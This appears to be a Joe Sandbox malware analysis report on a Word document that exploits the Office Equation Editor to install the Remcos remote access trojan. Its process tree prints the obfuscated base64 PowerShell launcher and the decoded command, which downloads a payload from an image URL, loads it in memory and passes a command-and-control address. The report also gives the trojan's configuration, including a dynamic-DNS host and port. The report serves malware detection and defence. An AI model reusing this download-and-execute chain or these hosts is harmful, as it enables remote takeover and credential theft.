Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xrrwwstCMd.docx

Overview

General Information

Sample name:xrrwwstCMd.docx
renamed because original name is a hash value
Original sample name:f27f42ce5ed4153d4d30a383c800b415d4e5b78a08556fa2b4f57bdbb0802a76.docx
Analysis ID:1508111
MD5:7a26583595ab1c59cba058c4327335ed
SHA1:a745152360c26a93aa72b4e7bd0b1f69a91226af
SHA256:f27f42ce5ed4153d4d30a383c800b415d4e5b78a08556fa2b4f57bdbb0802a76
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3320 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3680 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3744 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?QwBI? ? ? ? ?E0? ? ? ? ?Ug? ? ? ? ?v? ? ? ? ?D? ? ? ? ?? ? ? ? ?NQ? ? ? ? ?v? ? ? ? ?DQ? ? ? ? ?O? ? ? ? ?? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?MQ? ? ? ? ?0? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?5? ? ? ? ?DM? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DU? ? ? ? ?O? ? ? ? ?? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBw? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?FI? ? ? ? ?ZQBn? ? ? ? ?EE? ? ? ? ?cwBt? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 4084 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 4092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kvsjjdtlyhiliuyshkqzizcqbm" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3088 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uxxbkweempbqtbmwyvcbtlxzcbqib" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "dremom2.duckdns.org:2201:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OT0ZCG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1144:$obj1: \objhtml
  • 0x117d:$obj2: \objdata
  • 0x1169:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1144:$obj1: \objhtml
  • 0x117d:$obj2: \objdata
  • 0x1169:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4b8:$a1: Remcos restarted by watchdog!
          • 0x6ca30:$a3: %02i:%02i:%02i:%03i
          Click to see the 21 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          12.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            12.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
